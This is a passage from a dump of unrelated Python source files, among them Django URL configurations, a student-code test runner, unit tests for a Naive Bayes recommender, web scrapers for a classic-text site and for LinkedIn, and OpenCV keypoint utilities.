'+str(self.HookingFunction))\n\t\t\t\tprint('From Module '+str(inspect.getmodule(self.HookingFunction)))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#call the method\n\t\t\t\tOutputVariable=self.HookingFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\telse:\n\n\t\t\t\t#Return the instance\n\t\t\t\treturn InstanceVariable\n\n\t\t\t#Before hooks (integrativ loop)\n\t\t\tfor __HookedBeforeFunction in self.HookedBeforeFunctionsList:\n\n\t\t\t\t#Check\n\t\t\t\tif _VariablesDict['HookingIsBool']:\n\t\t\t\t\t\n\t\t\t\t\t#Check\n\t\t\t\t\tif callable(__HookedBeforeFunction):\n\n\t\t\t\t\t\t#Check if it is a unique call or not\n\t\t\t\t\t\tIsCalledBool=True\n\t\t\t\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\t\t\t\tif __HookedBeforeFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\t\t\t\tIsCalledBool=False\n\n\t\t\t\t\t\t#Append \n\t\t\t\t\t\t_VariablesDict['HookedFunctionsList'].append(__HookedBeforeFunction)\n\n\t\t\t\t\t\t#Check for calling\n\t\t\t\t\t\tif IsCalledBool:\n\n\t\t\t\t\t\t\t#Debug\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tprint('__HookedBeforeFunction is called '+str(__HookedBeforeFunction))\n\t\t\t\t\t\t\tprint('From Module '+str(inspect.getmodule(__HookedBeforeFunction)))\n\t\t\t\t\t\t\tprint('')\n\t\t\t\t\t\t\t'''\n\n\t\t\t\t\t\t\t#Call\n\t\t\t\t\t\t\tOutputVariable=__HookedBeforeFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\t\telse:\n\n\t\t\t\t\t#Return the Instance\n\t\t\t\t\treturn InstanceVariable\n\n\t\t\t#Return self for the wrapped method call\n\t\t\treturn InstanceVariable\n\n\t\t#Set the name\n\t\tHookedFunction.__name__='Hooked_'+self.HookedFunctionString\n\n\t\t#Give a Pointer to the Hooker\n\t\tHookedFunction.HookerPointer=self\n\n\t\t#Define a represent function for the hooked function\n\t\tdef represent():\n\t\t\tRepresentedString=inspect.getmodule(self.HookingFunction\n\t\t\t\t\t).__name__+'.Hooked_'+self.HookingFunction.__repr__()\n\t\t\treturn RepresentedString\n\n\t\tHookedFunction.__repr__=represent\n\n\t\t#Set\n\t\tself.HookedFunction=HookedFunction\n\n\t\t#Return self\n\t\treturn self\n\n#\n\n","sub_path":"Modules/Init/Modules/_LastDrafts/00c_Hooker/Drafts/Hooker copy 2.py","file_name":"Hooker copy 2.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"387414348","text":"from django.conf.urls import url\n\nfrom . 
import views\n\napp_name = 'reports'\n\nurlpatterns = [\n url(r'^index_report$', views.index_report, name='index_report'),\n url(r'^health_summery_damageloss_dis_report$', views.health_summery_damageloss_dis_report, name='health_summery_damageloss_dis_report'),\n url(r'^health_summery_damageloss_national_report$', views.health_summery_damageloss_national_report, name='health_summery_damageloss_national_report'),\n url(r'^health_summery_damageloss_province_report$', views.health_summery_damageloss_province_report, name='health_summery_damageloss_province_report'),\n\n # fetch data\n url(r'^dl_fetch_report_data$', views.dl_fetch_report_data, name='dl_fetch_report_data'),\n\n #education\n url(r'^education_summary$', views.education_summary, name='education_summary'),\n\n #mining\n url(r'^mining_summary$', views.mining_summary, name='mining_summary'),\n\n #other government services\n url(r'^other_govn_services_summary$', views.other_govn_services_summary, name='other_govn_services_summary'),\n\n #transport land\n url(r'^transport_land_summary$', views.transport_land_summary, name='transport_land_summary'),\n\n #transport rail\n url(r'^transport_rail_summary$', views.transport_rail_summary, name='transport_rail_summary'),\n\n #transport water\n url(r'^transport_water_summary$', views.transport_water_summary, name='transport_water_summary'),\n\n #transport air\n url(r'^transport_air_summary$', views.transport_air_summary, name='transport_air_summary'),\n\n #water_supply\n url(r'^water_supply_summary$', views.water_supply_summary, name='water_supply_summary'),\n\n #power_supply\n url(r'^power_supply_summary$', views.power_supply_summary, name='power_supply_summary'),\n\n #industry_services\n url(r'^industry_services_summary$', views.industry_services_summary, name='industry_services_summary'),\n\n]\n","sub_path":"reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7794820","text":"from checkpy import printer\nfrom checkpy.entities import exception, path\nfrom checkpy.tester import discovery\nfrom checkpy.tester.sandbox import Sandbox\nimport os\nimport subprocess\nimport sys\nimport importlib\nimport multiprocessing\nimport time\n\ndef test(testName, module = \"\", debugMode = False, silentMode = False):\n\tprinter.printer.SILENT_MODE = silentMode\n\n\tresult = TesterResult(testName)\n\n\tpath = discovery.getPath(testName)\n\tif not path:\n\t\tresult.addOutput(printer.displayError(\"File not found: {}\".format(testName)))\n\t\treturn result\n\tpath = str(path)\n\n\tfileName = os.path.basename(path)\n\tfilePath = os.path.dirname(path)\n\n\tif filePath not in sys.path:\n\t\tsys.path.append(filePath)\n\n\ttestFileName = fileName.split(\".\")[0] + \"Test.py\"\n\ttestPaths = discovery.getTestPaths(testFileName, module = module)\n\n\tif not testPaths:\n\t\tresult.addOutput(printer.displayError(\"No test found for {}\".format(fileName)))\n\t\treturn result\n\n\tif len(testPaths) > 1:\n\t\tresult.addOutput(printer.displayWarning(\"Found {} tests: {}, using: {}\".format(len(testPaths), testPaths, testPaths[0])))\n\n\ttestFilePath = str(testPaths[0])\n\n\tif testFilePath not in sys.path:\n\t\tsys.path.append(testFilePath)\n\n\tif path.endswith(\".ipynb\"):\n\t\tif subprocess.call(['jupyter', 'nbconvert', '--to', 'script', path]) != 0:\n\t\t\tresult.addOutput(printer.displayError(\"Failed to convert Jupyter notebook to .py\"))\n\t\t\treturn result\n\n\t\tpath = 
path.replace(\".ipynb\", \".py\")\n\n\t\t# remove all magic lines from notebook\n\t\twith open(path, \"r\") as f:\n\t\t\tlines = f.readlines()\n\t\twith open(path, \"w\") as f:\n\t\t\tf.write(\"\".join([l for l in lines if \"get_ipython\" not in l]))\n\n\ttesterResult = _runTests(testFileName.split(\".\")[0], path, debugMode = debugMode, silentMode = silentMode)\n\n\tif path.endswith(\".ipynb\"):\n\t\tos.remove(path)\n\n\ttesterResult.output = result.output + testerResult.output\n\treturn testerResult\n\n\ndef testModule(module, debugMode = False, silentMode = False):\n\tprinter.printer.SILENT_MODE = silentMode\n\ttestNames = discovery.getTestNames(module)\n\n\tif not testNames:\n\t\tprinter.displayError(\"no tests found in module: {}\".format(module))\n\t\treturn\n\n\treturn [test(testName, module = module, debugMode = debugMode, silentMode = silentMode) for testName in testNames]\n\ndef _runTests(moduleName, fileName, debugMode = False, silentMode = False):\n\tif sys.version_info[:2] >= (3,4):\n\t\tctx = multiprocessing.get_context(\"spawn\")\n\telse:\n\t\tctx = multiprocessing\n\n\tsignalQueue = ctx.Queue()\n\tresultQueue = ctx.Queue()\n\ttester = _Tester(moduleName, path.Path(fileName).absolutePath(), debugMode, silentMode, signalQueue, resultQueue)\n\tp = ctx.Process(target=tester.run, name=\"Tester\")\n\tp.start()\n\n\tstart = time.time()\n\tisTiming = False\n\n\twhile p.is_alive():\n\t\twhile not signalQueue.empty():\n\t\t\tsignal = signalQueue.get()\n\t\t\tisTiming = signal.isTiming\n\t\t\tdescription = signal.description\n\t\t\ttimeout = signal.timeout\n\t\t\tif signal.resetTimer:\n\t\t\t\tstart = time.time()\n\n\t\tif isTiming and time.time() - start > timeout:\n\t\t\tresult = TesterResult(path.Path(fileName).fileName)\n\t\t\tresult.addOutput(printer.displayError(\"Timeout ({} seconds) reached during: {}\".format(timeout, description)))\n\t\t\tp.terminate()\n\t\t\tp.join()\n\t\t\treturn result\n\n\t\tif not resultQueue.empty():\n\t\t\tp.terminate()\n\t\t\tp.join()\n\t\t\tbreak\n\n\t\ttime.sleep(0.1)\n\n\tif not resultQueue.empty():\n\t\treturn resultQueue.get()\n\n\traise exception.CheckpyError(message = \"An error occured while testing. 
The testing process exited unexpectedly.\")\n\nclass TesterResult(object):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.nTests = 0\n\t\tself.nPassedTests = 0\n\t\tself.nFailedTests = 0\n\t\tself.nRunTests = 0\n\t\tself.output = []\n\t\tself.testResults = []\n\n\tdef addOutput(self, output):\n\t\tself.output.append(output)\n\n\tdef addResult(self, testResult):\n\t\tself.testResults.append(testResult)\n\n\tdef asDict(self):\n\t\treturn {\"name\":self.name,\n\t\t\t\t\"nTests\":self.nTests,\n\t\t\t \"nPassed\":self.nPassedTests,\n\t\t\t\t\"nFailed\":self.nFailedTests,\n\t\t\t\t\"nRun\":self.nRunTests,\n\t\t\t\t\"output\":self.output,\n\t\t\t\t\"results\":[tr.asDict() for tr in self.testResults]}\n\nclass _Signal(object):\n\tdef __init__(self, isTiming = False, resetTimer = False, description = None, timeout = None):\n\t\tself.isTiming = isTiming\n\t\tself.resetTimer = resetTimer\n\t\tself.description = description\n\t\tself.timeout = timeout\n\nclass _Tester(object):\n\tdef __init__(self, moduleName, filePath, debugMode, silentMode, signalQueue, resultQueue):\n\t\tself.moduleName = moduleName\n\t\tself.filePath = filePath\n\t\tself.debugMode = debugMode\n\t\tself.silentMode = silentMode\n\t\tself.signalQueue = signalQueue\n\t\tself.resultQueue = resultQueue\n\n\tdef run(self):\n\t\tprinter.printer.DEBUG_MODE = self.debugMode\n\t\tprinter.printer.SILENT_MODE = self.silentMode\n\n\t\t# overwrite argv so that it seems the file was run directly\n\t\tsys.argv = [self.filePath.fileName]\n\n\t\tmodule = importlib.import_module(self.moduleName)\n\t\tmodule._fileName = self.filePath.fileName\n\n\t\tif hasattr(module, \"sandbox\"):\n\t\t\twith Sandbox(self.filePath.absolutePath()):\n\t\t\t\tmodule.sandbox()\n\t\t\t\treturn self._runTestsFromModule(module)\n\n\t\treturn self._runTestsFromModule(module)\n\n\tdef _runTestsFromModule(self, module):\n\t\tself._sendSignal(_Signal(isTiming = False))\n\n\t\tresult = TesterResult(self.filePath.fileName)\n\t\tresult.addOutput(printer.displayTestName(self.filePath.fileName))\n\n\t\tif hasattr(module, \"before\"):\n\t\t\ttry:\n\t\t\t\tmodule.before()\n\t\t\texcept Exception as e:\n\t\t\t\tresult.addOutput(printer.displayError(\"Something went wrong at setup:\\n{}\".format(e)))\n\t\t\t\treturn\n\n\t\ttestCreators = [method for method in module.__dict__.values() if getattr(method, \"isTestCreator\", False)]\n\t\tresult.nTests = len(testCreators)\n\n\t\ttestResults = self._runTests(testCreators)\n\n\t\tresult.nRunTests = len(testResults)\n\t\tresult.nPassedTests = len([tr for tr in testResults if tr.hasPassed])\n\t\tresult.nFailedTests = len([tr for tr in testResults if not tr.hasPassed])\n\n\t\tfor testResult in testResults:\n\t\t\tresult.addResult(testResult)\n\t\t\tresult.addOutput(printer.display(testResult))\n\n\t\tif hasattr(module, \"after\"):\n\t\t\ttry:\n\t\t\t\tmodule.after()\n\t\t\texcept Exception as e:\n\t\t\t\tresult.addOutput(printer.displayError(\"Something went wrong at closing:\\n{}\".format(e)))\n\n\t\tself._sendResult(result)\n\n\tdef _runTests(self, testCreators):\n\t\tcachedResults = {}\n\n\t\t# run tests in noncolliding execution order\n\t\tfor test in self._getTestsInExecutionOrder([tc(self.filePath.fileName) for tc in testCreators]):\n\t\t\tself._sendSignal(_Signal(isTiming = True, resetTimer = True, description = test.description(), timeout = test.timeout()))\n\t\t\tcachedResults[test] = test.run()\n\t\t\tself._sendSignal(_Signal(isTiming = False))\n\n\t\t# return test results in specified order\n\t\treturn 
[cachedResults[test] for test in sorted(cachedResults.keys()) if cachedResults[test] != None]\n\n\tdef _sendResult(self, result):\n\t\tself.resultQueue.put(result)\n\n\tdef _sendSignal(self, signal):\n\t\tself.signalQueue.put(signal)\n\n\tdef _getTestsInExecutionOrder(self, tests):\n\t\ttestsInExecutionOrder = []\n\t\tfor i, test in enumerate(tests):\n\t\t\tdependencies = self._getTestsInExecutionOrder([tc(self.filePath.fileName) for tc in test.dependencies()]) + [test]\n\t\t\ttestsInExecutionOrder.extend([t for t in dependencies if t not in testsInExecutionOrder])\n\t\treturn testsInExecutionOrder\n","sub_path":"checkpy/tester/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426227792","text":"import unittest2 as unittest\n\nfrom twitter.common.contextutil import temporary_file_path\nfrom twitter.pants.base.run_info import RunInfo\n\n\nclass RunInfoTest(unittest.TestCase):\n def test_run_info_read(self):\n with temporary_file_path() as tmppath:\n with open(tmppath, 'w') as tmpfile:\n tmpfile.write('foo:bar\\n baz :qux quux')\n ri = RunInfo(tmppath)\n self.assertEquals(ri.path(), tmppath)\n\n # Test get_info access.\n self.assertEquals(ri.get_info('foo'), 'bar')\n self.assertEquals(ri.get_info('baz'), 'qux quux')\n self.assertIsNone(ri.get_info('nonexistent'))\n\n # Test dict-like access.\n self.assertEquals(ri['foo'], 'bar')\n self.assertEquals(ri['baz'], 'qux quux')\n\n def test_write_run_info(self):\n with temporary_file_path() as tmppath:\n ri = RunInfo(tmppath)\n ri.add_info('key1', 'val1')\n ri.add_infos(('key2', ' val2'), (' key3 ', 'val3 '))\n self.assertEquals({'key1': 'val1', 'key2': 'val2', 'key3': 'val3'}, ri.get_as_dict())\n\n with open(tmppath, 'r') as tmpfile:\n contents = tmpfile.read()\n self.assertEquals('key1: val1\\nkey2: val2\\nkey3: val3\\n', contents)\n","sub_path":"tests/python/twitter/pants/base/test_run_info.py","file_name":"test_run_info.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513840457","text":"# Homework 4 solution\n# INFO 4871/5871, Spring 2019\n# Robin Burke\n# University of Colorado, Boulder\n\nfrom naive_bayes import NaiveBayesRecommender\nimport unittest\nimport pandas as pd\n\n\nclass test_NaiveBayes(unittest.TestCase):\n\n _algo = None\n _ratings = None\n _features = None\n\n def setUp(self):\n self._features = pd.read_csv('test_features.csv')\n self._algo = NaiveBayesRecommender(self._features, thresh=2.9, alpha=0.01, beta=0.02)\n\n self._ratings = pd.read_csv('test.csv')\n self._ratings.columns = ['user', 'item', 'rating']\n\n self._algo.fit(self._ratings)\n\n # Test reset\n def test_reset(self):\n nb_table = self._algo._nb_table\n nb_table.reset()\n self.assertEqual(0, nb_table.user_count(1, liked=True), \"Reset did not work.\")\n\n # Test handling for zero scores\n def test_zeros(self):\n # Set all of user 1's counts to zero\n nliked_cond_table1 = self._algo._nb_table.nliked_cond_table[1]\n for key in nliked_cond_table1.keys():\n nliked_cond_table1[key] = 0\n\n self._algo._nb_table.beta = 0\n\n # Should NOT raise divison by zero\n self._algo.score_item(1, 1)\n\n\n # Test values in liked and nliked tables\n # User 1 liked 2 and disliked 2\n # User 3 liked 1 and disliked 2\n def test_liked_tables(self):\n nb_table = self._algo._nb_table\n self.assertEqual(2, nb_table.user_count(1, liked=True), \"User 1 liked count 
incorrect\")\n self.assertEqual(2, nb_table.user_count(1, liked=False), \"User 1 disliked count incorrect\")\n self.assertEqual(1, nb_table.user_count(3, liked=True), \"User 3 liked count incorrect\")\n self.assertEqual(2, nb_table.user_count(3, liked=False), \"User 3 disliked count incorrect\")\n\n # Test values in linked and nliked cond tables\n # User 1 liked items with Feature D 2 times\n # User 1 disliked items with Feature J 1 time\n def test_cond_tables(self):\n nb_table = self._algo._nb_table\n self.assertEqual(2, nb_table.user_feature_count(1, 'D', liked=True),\n \"User 1 liked feature count D incorrect\")\n self.assertEqual(1, nb_table.user_feature_count(1, 'J', liked=False),\n \"User 1 disliked feature count J incorrect\")\n\n # Test liked and nliked probability calculation\n def test_liked_prob(self):\n nb_table = self._algo._nb_table\n self.assertAlmostEqual(0.5, nb_table.user_prob(1, liked=True), 5,\n \"User 1 liked probability incorrect\")\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.334437, nb_table.user_prob(3, liked=True), 5,\n \"User 3 liked probability incorrect\")\n self.assertAlmostEqual(0.5, nb_table.user_prob(1, liked=False), 5,\n \"User 1 disliked probability incorrect\")\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.0033112, nb_table.user_prob(5, liked=False), 5,\n \"User 5 disliked probability incorrect\")\n\n # Test conditional probability calculations\n def test_cond_prob(self):\n nb_table = self._algo._nb_table\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.990196, nb_table.user_feature_prob(1, 'D', liked=True), 5,\n \"User 1 liked feature prob D incorrect\")\n self.assertAlmostEqual(0.009803922, nb_table.user_feature_prob(1, 'G', liked=False), 5,\n \"User 1 disliked feature prob G incorrect\")\n \n\n # Test score User 3 Item 5\n def test_pred1(self):\n score = self._algo.score_item(3, 5)\n self.assertAlmostEqual(2.67090, score, 5,\n 'User 3 item 5 prediction incorrect')\n\n # Test score User 1 Item 5\n def test_pred2(self):\n score = self._algo.score_item(1, 5)\n# TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(3.931825, score, 5,\n 'User 1 item 5 prediction incorrect')\n\n # Test score User 5 Item 2\n def test_pred3(self):\n score = self._algo.score_item(5, 2)\n # TODO: HOMEWORK 4. 
Put correct calculated value here\r\n        self.assertAlmostEqual(6.161364, score, 5,\r\n                               'User 5 item 2 prediction incorrect')\r\n\r\n    def test_recommend(self):\r\n        recs = self._algo.recommend(3, 2, candidates=[4, 5])\r\n        recs_list = list(recs['item'])\r\n        self.assertEqual(5, recs_list[0], 'Recommendations for user 3 in wrong order.')\r\n","sub_path":"Naive Bayes Recommender System/test_naive_bayes.py","file_name":"test_naive_bayes.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"139792143","text":"from django.core import paginator\nfrom django.urls import path\n\nfrom Log import views\n\nurlpatterns = [\n    path('',views.home,name='home'),\n    path('loginpage', views.Loginpage,name='loginpage' ),\n    path('BDAloginpage', views.ABDAloginpage, name='BDAloginpage'),\n    path('Dashboard', views.DDashboard, name='Dashboard'),\n    path('upload/', views.Upload, name='upload'),\n    path('Books/', views.BBooks, name='Books'),\n    # path('search', views.Search, name='search'),\n    path('delete//', views.Delete, name='delete'),\n\n]","sub_path":"Log/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"213191390","text":"import json\nimport requests\nfrom copy import deepcopy\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, asdict\nfrom typing import List\n\ncontent = requests.get('https://wwwdek.inf.tu-dresden.de/lehre/sose/20/studiengang/studiengang_inf_bach.html').content.decode()\ndocument = BeautifulSoup(content, 'html.parser')\n\nstructure = [e for e in document.recursiveChildGenerator() if e.name in ['h1', 'h2', 'h3', 'table']][2:-1]\n\n\n@dataclass\nclass Module:\n    name: str\n    code: str = ''\n\n    # HTML heading\n    level: int = 0\n\n@dataclass\nclass Course:\n    # Title of course\n    name: str\n    # Amount of time; [lecture, exercise, practical]\n    hours: List[int]\n    # Name of tutors/teachers\n    teachers: List[str]\n    # Three letter code\n    institute: str\n    # Unique code for course; only mandatory\n    code: str = ''\n    # Verbal description of type of examination, only obligatory\n    exam: str = ''\n    # Master level, only obligatory\n    master: bool = False\n    # Modules\n    modules: List[Module] = None\n\n\ndef unique_objects(objects, key):\n    return list({getattr(o, key):o for o in objects}.values())\n\n\ndef parse_hours(hours: str) -> List[int]:\n    \"\"\" '2/2/0' => [2,2,0] \"\"\"\n    return [int(time) for time in hours.split('/')]\n\ndef parse_teachers(teachers: str) -> List[str]:\n    return teachers.split(', ')\n\ndef parse_table(table):\n    courses = []\n    rows = table.find_all('tr')\n\n    # Skip headers\n    rows = rows[1:]\n\n    for index, row in enumerate(rows):\n        cells_content = [td.text.strip() for td in row.find_all('td')]\n        if not cells_content:\n            continue\n        \n        if len(cells_content) == 6:\n            # Name, Code, Hours, Language, Teachers, Institute\n            name, code, hours, _, teachers, institute = cells_content\n            courses.append(Course(\n                name=name, \n                code=code,\n                hours=parse_hours(hours),\n                teachers=parse_teachers(teachers),\n                institute=institute,\n            ))\n        else:\n            # Name, Hours, Language, Teachers, Institute, Exam, Master\n            name, hours, _, teachers, institute, exam, master = cells_content\n            courses.append(Course(\n                name=name, \n                hours=parse_hours(hours),\n                teachers=parse_teachers(teachers),\n                institute=institute,\n                exam=exam,\n                master=True if master == \"ja\" else False\n            ))\n    \n    return courses\n\n\n\ndef create_module(tag: str, 
text: str) -> Module:\n    level = int(tag[1])\n    if text.startswith('INF'):\n        # Module\n        code, name = text.split(' ', 1)\n        return Module(name=name, code=code, level=level)\n    else:\n        # Semester\n        return Module(name=text, level=level)\n\n\nmodule_path = []\nall_courses = []\n\nfor element in structure:\n    tag = element.name\n\n    if tag.startswith('h'):\n        # Adapt current module path\n        text = element.text.strip()\n\n        module = create_module(tag, text)\n        \n        if not module_path:\n            module_path = [module]\n        else:\n            if module.level > module_path[-1].level:\n                module_path.append(module)\n            elif module.level == module_path[-1].level:\n                module_path[-1] = module\n            else:\n                module_path = [module]\n        \n        print(f'Level {module.level}: {module_path}')\n        \n    if tag == 'table':\n        module = module_path[1] if len(module_path) > 1 else module_path[0]\n        courses = parse_table(element)\n        \n        for course in courses:\n            try:\n                if not courses:\n                    raise StopIteration\n                existing_course = next(c for c in all_courses if c.name == course.name)\n                # Merge with existing course\n                existing_course.modules = unique_objects(deepcopy(module_path) + existing_course.modules, key=\"name\")\n                \n            except StopIteration:\n                # Create new course\n                course.modules = deepcopy(module_path)\n                all_courses += [course]\n\nwith open('output.json', 'w') as file:\n    json.dump([asdict(course) for course in all_courses], file, indent=4, ensure_ascii=False)","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"55196135","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request, Response\nfrom functools import wraps\nimport os\napp = Flask(__name__)\n\nfrom person import scrape_person\nfrom company import scrape_company\n\nLINKEDIN_PERSON_BASE_URL = \"https://www.linkedin.com/in/\"\nLINKEDIN_COMPANY_BASE_URL = \"https://www.linkedin.com/company/\"\nHEADER_AUTH_TOKEN = os.environ.get(\"HEADER_AUTH_TOKEN\")\n\n\ndef check_auth(auth):\n    \"\"\"This function is called to check if the supplied\n    Authorization header value matches the expected token.\n    \"\"\"\n    return auth == HEADER_AUTH_TOKEN\n\n\ndef authenticate():\n    \"\"\"Sends a 401 response for incorrect auth headers\"\"\"\n    return Response(\n    'You need proper login credentials to access this page', 401,\n    {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n\ndef requires_auth(f):\n    @wraps(f)\n    def decorated(*args, **kwargs):\n        auth = request.headers.get(\"Authorization\")\n        if not auth or not check_auth(auth):\n            return authenticate()\n        return f(*args, **kwargs)\n    return decorated\n\n\n\n@app.route('/health-check/', methods=['GET'])\ndef health_check():\n    return jsonify({\"healthy\": True})\n\n\"\"\"\nFormat for linkedin person\nhttps://www.linkedin.com/in/mikesmith/\n\"\"\"\n@app.route('/linkedin/person/<person_id>/', methods=['GET'])\n@requires_auth\ndef person(person_id):\n    try:\n        res = scrape_person(LINKEDIN_PERSON_BASE_URL + person_id + \"/\")\n        return jsonify(res)\n    except Exception as e:\n        print(e)\n        return jsonify({\"errors\":str(e)})\n\n\n\"\"\"\nFormat for linkedin company\nhttps://www.linkedin.com/company/drive-capital/\n\"\"\"\n@app.route('/linkedin/company/<company_id>/', methods=['GET'])\n@requires_auth\ndef company(company_id):\n\n    url = LINKEDIN_COMPANY_BASE_URL + company_id + \"/\"\n    try:\n        res = scrape_company(url)\n        return jsonify(res)\n    except Exception as e:\n        print(e)\n        return jsonify({\"errors\":str(e)})\n\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\", 
debug=True)\n","sub_path":"linkedin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"195152515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/1/29 13:53\n# @Author : 1823218990@qq.com\n# @File : sanzijing.py\n# @Software: PyCharm\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nsys.path.append(\"../\")\nfrom database.tbl_poetry import TblPoetry\nurl = 'https://sanzijing.bmcx.com/'\ndef main():\n    html_base = requests.get(url)\n    soup = BeautifulSoup(html_base.text, 'lxml')\n    # print(soup)\n    m_content = soup.find(\"div\", {\"class\": \"szj_nr\"})\n    lis = m_content.find_all(\"li\")\n    sanzijing = []\n    count = 1\n    for li in lis:\n        # print(li)\n        spans = li.find_all(\"span\", {\"class\": \"\"})\n        ps = li.find_all(\"p\", {\"class\": \"\"})\n        try:\n            gene_dict(spans, ps, count)\n            count += 1\n        except Exception as e:\n            print(e)\n            print(spans, ps)\n            break\n    # return\n\n\ndef gene_dict(spans, ps, count):\n    szj = dict()\n    content = spans[0].text + \",\" + spans[1].text + \"。\\n\" + spans[2].text + \",\" + spans[3].text + \"。\"\n    szj[\"content\"] = content\n    szj[\"title\"] = u\"节选 \"+ str(count) + \"·\" + spans[0].text\n    szj[\"poet\"] = \"\"\n    if len(ps) == 2:\n        describe = ps[0].text + '\\n' + ps[1].text\n    else:\n        describe = ''\n        for p in ps:\n            describe += p.text + '\\n'\n\n    szj[\"describe\"] = describe\n    szj[\"category\"] = u\"\"\n    szj[\"agg\"] = u\"三字经\"\n    # print(szj)\n    add_szj_to_db(szj)\n\n\n\ndef mydb():\n    from sqlalchemy import create_engine\n    from sqlalchemy.orm import sessionmaker, scoped_session\n    from sqlalchemy.ext.declarative import declarative_base\n    import pymysql\n    pymysql.install_as_MySQLdb()\n\n    ModelBase = declarative_base()\n    import platform\n    if platform.system() == \"Windows\":\n        engine = create_engine('sqlite:///D:/project/notes/FSTornado/wfs.db?check_same_thread=False', echo=False)\n    else:\n        engine = create_engine('sqlite:////opt/midware/FSTornado/wfs.db?check_same_thread=False', echo=False)\n    session_factory = sessionmaker(bind=engine)\n    db_session = scoped_session(session_factory)\n    return db_session\n\n\ndef add_szj_to_db(szj):\n    db = mydb()\n    exist = db.query(TblPoetry).filter(TblPoetry.agg == szj['agg'], TblPoetry.title == szj['title']).first()\n    if exist:\n        print(\"is exist\", exist.id)\n    else:\n        # tbl = TblPoetry(szj)\n        # db.add(tbl)\n        # db.commit()\n        tbl = TblPoetry()\n        for k,v in szj.items():\n            tbl.__setattr__(k, v)\n        db.add(tbl)\n        db.commit()\n    # print(tbl.describe)\n\n\n\nif __name__ == '__main__':\n    main()","sub_path":"FSTornado/dscrapy/sanzijing.py","file_name":"sanzijing.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"91084127","text":"# -*- coding: utf-8 -*-\r\n#\r\n\r\n'''\r\nCreate a keypoint feature library for the reference images.\r\n\r\n'''\r\n\r\n# Python 2/3 compatibility\r\n\r\n\r\nimport argparse\r\nimport logging\r\nimport math\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nFLANN_INDEX_KDTREE = 1\r\nFLANN_INDEX_LSH = 6\r\n\r\ndef load_keypoint_data(filename):\r\n    npzfile = np.load(filename)\r\n    keypoints = [cv2.KeyPoint(x, y, size, angle, response, int(octave), int(class_id))\r\n                 for x, y, size, angle, response, octave, class_id in npzfile['keypoints']]\r\n    return keypoints, npzfile['descriptors']\r\n\r\ndef save_model_data(filename, keypoints, descriptors, points3d, focals, pose):\r\n    '''Write npz-format data to the file 
specified by path.'''\r\n    kpdata = np.array([(kp.pt[0], kp.pt[1], kp.size, kp.angle, kp.response, kp.octave, kp.class_id)\r\n                       for kp in keypoints])\r\n    np.savez(filename, keypoints=kpdata, descriptors=descriptors, points3d=points3d, focals=focals, pose=pose)\r\n    return filename\r\n\r\ndef stereo_rectify(cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize, R, T):\r\n    R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(\r\n        cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize, R, T\r\n    )\r\n    return P1, P2, Q\r\n\r\ndef triangulate_points(projMatr1, projMatr2, projPoints1, projPoints2):\r\n    points4D = cv2.triangulatePoints(projMatr1, projMatr2, projPoints1, projPoints2)\r\n    return cv2.convertPointsFromHomogeneous(points4D.T)\r\n\r\ndef filter_matches(kp1, kp2, matches, ratio = 0.75):\r\n    mkp1, mkp2 = [], []\r\n    mi = []\r\n    for m in matches:\r\n        if len(m) == 2 and m[0].distance < m[1].distance * ratio:\r\n            m = m[0]\r\n            mkp1.append( kp1[m.queryIdx] )\r\n            mkp2.append( kp2[m.trainIdx] )\r\n            mi.append(m)\r\n    p1 = np.float32([kp.pt for kp in mkp1])\r\n    p2 = np.float32([kp.pt for kp in mkp2])\r\n    kp_pairs = 